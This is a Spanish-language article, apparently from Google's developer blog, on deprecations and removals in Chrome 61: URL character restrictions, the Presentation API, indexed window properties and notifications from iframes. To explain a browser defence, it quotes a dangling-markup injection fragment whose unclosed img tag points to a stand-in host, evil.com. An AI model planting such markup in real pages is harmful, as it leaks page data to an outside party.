Bajas y eliminaciones en Chrome 61

Joe Medley
Jo Medley

En casi todas las versiones de Chrome, vemos una cantidad significativa de actualizaciones y mejoras del producto, su rendimiento y las capacidades de la plataforma web. En este artículo, se describen las bajas y las eliminaciones en Chrome 61, que está en versión beta a partir del 3 de agosto. Esta lista está sujeta a cambios en cualquier momento.

Seguridad y privacidad

Bloquear los recursos cuyas URLs contengan caracteres '\n' y '<'

Existe un tipo de hackeo llamado inyección de lenguaje de marcado pendiente en el que se usa una URL truncada para enviar datos a un extremo externo. Por ejemplo, considera una página que contenga <img src='https://evil.com/?. Debido a que la URL no tiene comillas de cierre, los navegadores leerán la siguiente cita que se genere y tratarán los caracteres encerrados como si fueran una sola URL.

En Chrome 61, se restringe esta vulnerabilidad mediante los grupos de caracteres permitidos en los atributos href y src. Específicamente, Chrome dejará de procesar las URLs cuando encuentre caracteres de línea nuevos (\n) y menos que caracteres (<).

En su lugar, los desarrolladores con un caso de uso legítimo para una línea nueva y menos de caracteres en una URL deben escapar estos caracteres.

Intent de quitar | Seguimiento de Chromestatus | Error de Chromium

La API de Presentación dejó de estar disponible y se quitó en contextos no seguros

Se descubrió que en orígenes inseguros, la API de Presentación se puede usar como un vector de hackeo en orígenes inseguros. Como las pantallas no tienen barras de direcciones, la API se puede usar para falsificar contenido. También es posible robar datos cuando ejecutas una presentación.

Para alinear la intención de Blink de quitar funciones potentes en orígenes inseguros, planeamos dar de baja y quitar la compatibilidad con la API de Presentación en contextos no seguros. A partir de Chrome 61, PresentationRequest.start() ya no funcionará en orígenes inseguros.

Intent de quitar | Seguimiento de Chromestatus | Error de Chromium

JavaScript

No permitir la definición de propiedades indexadas en Windows

Anteriormente, algunos navegadores permitían realizar asignaciones de JavaScript como las siguientes:

    window[0] = 1;

Las especificaciones de HTML actuales indican que se trata de un incumplimiento explícito de la especificación de JavaScript. Por lo tanto, esta capacidad se quita en Chrome 61. Desde febrero de 2016, Firefox ya cumple con la política.

Error de Chromium

Quitar el uso de notificaciones de iframes no seguros

Las solicitudes de permisos de iframes pueden confundir a los usuarios, ya que es difícil distinguir entre el origen de la página que las contiene y el origen del iframe que realiza la solicitud. Cuando el alcance de la solicitud no está claro, es difícil para los usuarios decidir si otorgar o rechazar el permiso.

Si inhabilitas las notificaciones en iframes, también se alinearán los requisitos de permisos de notificaciones con los de las notificaciones push, lo que simplificará los inconvenientes para los desarrolladores.

Los desarrolladores que necesiten esta función pueden abrir una ventana nueva para solicitar permisos de notificaciones.

Intent de quitar | Seguimiento de Chromestatus | Error de Chromium